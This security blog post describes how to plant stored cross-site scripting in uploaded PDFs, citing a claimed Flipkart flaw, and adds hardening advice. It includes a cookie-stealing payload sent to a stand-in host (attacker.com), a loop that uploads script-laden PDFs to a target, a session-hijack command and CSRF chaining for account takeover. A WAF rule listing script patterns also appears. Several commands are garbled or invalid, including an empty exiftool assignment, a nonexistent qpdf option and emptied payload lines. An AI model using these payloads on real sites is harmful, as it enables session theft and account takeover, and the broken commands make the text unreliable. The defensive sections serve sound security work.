Exclusive: Hidden Scripts in PDFs Bypass Flipkart’s Security – Your Files Are Not Safe! + Video

Listen to this Post

Featured Image

Introduction:

Stored Cross-Site Scripting (XSS) remains one of the most dangerous web vulnerabilities, allowing attackers to inject malicious scripts into trusted websites. A recent discovery on Flipkart’s PDF upload feature reveals that even mature platforms fail to sanitize file‑based inputs properly, enabling attackers to execute arbitrary JavaScript when a victim accesses an infected document. This oversight turns seemingly harmless file upload forms into potent attack vectors for session hijacking and account takeover.

Learning Objectives:

  • Understand how a malicious PDF can be crafted to trigger stored XSS.
  • Learn to test file upload endpoints for content‑based injection flaws.
  • Implement defensive controls such as strict sanitization, CSP, and secure document viewers.

You Should Know:

  1. Crafting a Malicious PDF Payload – Exploiting Trust in File Processing

Attackers leverage the fact that many web applications process PDFs without stripping embedded JavaScript. When the PDF is rendered in the browser (via native viewers or plugins), the script executes in the context of the vulnerable site. Below is a step‑by‑step guide to create a proof‑of‑concept PDF payload using common Linux and Windows tools.

Step‑by‑step guide (Linux/macOS):

1. Install required tools:

`sudo apt install exiftool qpdf texlive-extra-utils`

(On Windows, use WSL or download `exiftool.exe` and `qpdf` binaries.)

  1. Generate a basic PDF with embedded JavaScript using exiftool:

`exiftool -=’‘ innocent.pdf`

This injects the script into the PDF metadata. Many applications blindly render metadata fields.

  1. For more reliable execution, create a PDF with a JavaScript action using `pdftk` or qpdf:
    echo 'var payload = "<script>document.location=\"http://attacker.com/steal?cookie=\"+document.cookie</script>";' > inject.js
    qpdf --add-attachment inject.js original.pdf malicious.pdf
    

4. Alternatively, use `python` with `pypdf`:

from pypdf import PdfReader, PdfWriter
from pypdf.generic import NameObject, TextStringObject
writer = PdfWriter()
writer.add_blank_page(width=200, height=200)
writer.add_js('app.alert("XSS from PDF");')
with open("malicious.pdf", "wb") as f:
writer.write(f)
  1. Upload the resulting PDF to the target’s file upload endpoint (e.g., profile picture, invoice upload, support ticket). If the application stores and later renders the PDF in‑browser without sanitization, the alert (or cookie stealer) will fire.

Windows alternative:

Use `Adobe Acrobat Pro` → “JavaScript” tool → Add doc-level script, then save. Test upload.

  1. Testing for Stored XSS in File Uploads – Manual and Automated Methods

Before exploiting, security researchers must identify vulnerable file upload parameters. This section covers reconnaissance and detection techniques.

Step‑by‑step guide:

  1. Intercept upload request with Burp Suite (or OWASP ZAP):

– Set proxy to intercept POST requests to /upload, /submit, or /api/file.
– Observe Content-Type: multipart/form-data. The filename and file content are your injection points.

  1. Replace file content with a minimal HTML/XSS string (if the endpoint accepts text files as PDF – uncommon but possible). For PDFs, embed the payload as metadata as shown above.

3. Automate scanning with custom scripts:

 Linux – generate 50 variants using different metadata fields
for field in Author Subject Keywords; do
exiftool -$field='<script>alert("XSS")</script>' base.pdf payload_$field.pdf
curl -X POST -F "file=@payload_$field.pdf" https://target.com/upload
done
  1. Monitor for execution: After upload, retrieve the file URL from the server’s response (e.g., "location": "/uploads/abc123.pdf"). Open it in a browser with developer tools (F12) and check if the script runs.

  2. Advanced – use `polyglot` files: A PDF/HTML polyglot where the file is both a valid PDF and an HTML document. Tools like `polyglotmaker` can create files that execute JavaScript when loaded by browser PDF viewers.

  3. Mitigation – Hardening File Uploads Against Script Injection

Defenders must assume that all file types can carry malicious code. Implement a defense‑in‑depth strategy.

Step‑by‑step hardening guide:

  1. Content sanitization: Never trust client‑side validation. On the server:

– Convert PDFs to safe images using `ImageMagick` (Linux):
`convert input.pdf -quality 90 output.png` (then serve the PNG instead of the original PDF).
– Or strip all JavaScript from PDFs using `qpdf` with linearization:

`qpdf –decrypt –remove‑metadata –replace‑javascript=input.js stripped.pdf`

2. Implement a strict Content Security Policy (CSP):

Add HTTP response header:

`Content-Security-Policy: default-src ‘none’; script-src ‘none’; object-src ‘none’`

For PDF viewers that require scripts, use `sandbox` attribute: “ (avoid allow-scripts).

  1. Disable script execution in document viewers: Configure web servers to force download instead of inline rendering:

`Content-Disposition: attachment; filename=”file.pdf”`

This prevents the browser from executing any embedded script because the PDF opens in a standalone viewer (e.g., Adobe Acrobat), which typically has its own security zones.

  1. Use a Web Application Firewall (WAF) rule that inspects file content for patterns like <script, javascript:, onload=, alert(, etc. For mod_security (Linux Apache):
    SecRule FILES_CONTENT "!<script|javascript:|on\w+=" \ "id:123,deny,status:403,msg:'Malicious PDF content'"
    

  2. Validate file type by magic bytes (not just extension):

    Linux command to check true type
    file -b --mime-type uploaded.pdf
    

    For PDFs, the magic bytes are %PDF. Reject if mismatched.

  3. Exploitation Chain – From File Upload to Account Takeover

Once stored XSS is confirmed, an attacker can chain it with other techniques to compromise accounts.

Step‑by‑step exploitation:

1. Craft a payload that steals session cookies:

``
Embed this inside the PDF (using earlier methods). When any user opens the infected PDF, their cookie is exfiltrated.

  1. Perform session hijacking: Use the stolen cookie in another browser or tool (e.g., EditThisCookie extension or curl):
    `curl –cookie “session=STOLEN_VALUE” https://target.com/profile`

  2. Escalate to account takeover if the session allows password change without re‑authentication. Combine with a CSRF payload inside PDF:

``

  1. Automate the entire attack using a custom Python script that uploads the PDF, extracts the public link, and waits for victim interaction.

  2. Advanced Defense – Using AI to Detect Malicious PDFs

Machine learning models can identify anomalous JavaScript patterns or known exploit structures (e.g., CVE‑2018‑4993). This section introduces a basic detection pipeline.

Step‑by‑step tutorial:

  1. Extract PDF metadata and JavaScript using `pdfid` and `pdf-parser` (Linux):
    pip install peepdf
    peepdf malicious.pdf -c "extract js"
    

  2. Train a simple classifier with `scikit-learn` on a dataset of benign and malicious PDFs:

    from sklearn.ensemble import RandomForestClassifier
    Features: presence of /JavaScript, /JS, /OpenAction, /AA, number of objects
    model.fit(X_train, y_train)
    

  3. Deploy as a microservice – On file upload, send the PDF to a containerized ML model that returns a risk score. If score > threshold, reject or sandbox.

  4. Cloud hardening – Use AWS Lambda or Azure Functions to run the ML model serverlessly, scaling automatically.

6. Real‑World Command List for Forensic Analysis

After an incident, examine compromised systems for evidence of PDF XSS exploitation.

Linux commands:

  • Find all PDFs accessed in last 24 hours:

`find /var/www/uploads -name “.pdf” -mtime -1`

  • Grep PDF files for embedded scripts without opening:

`strings .pdf | grep -i “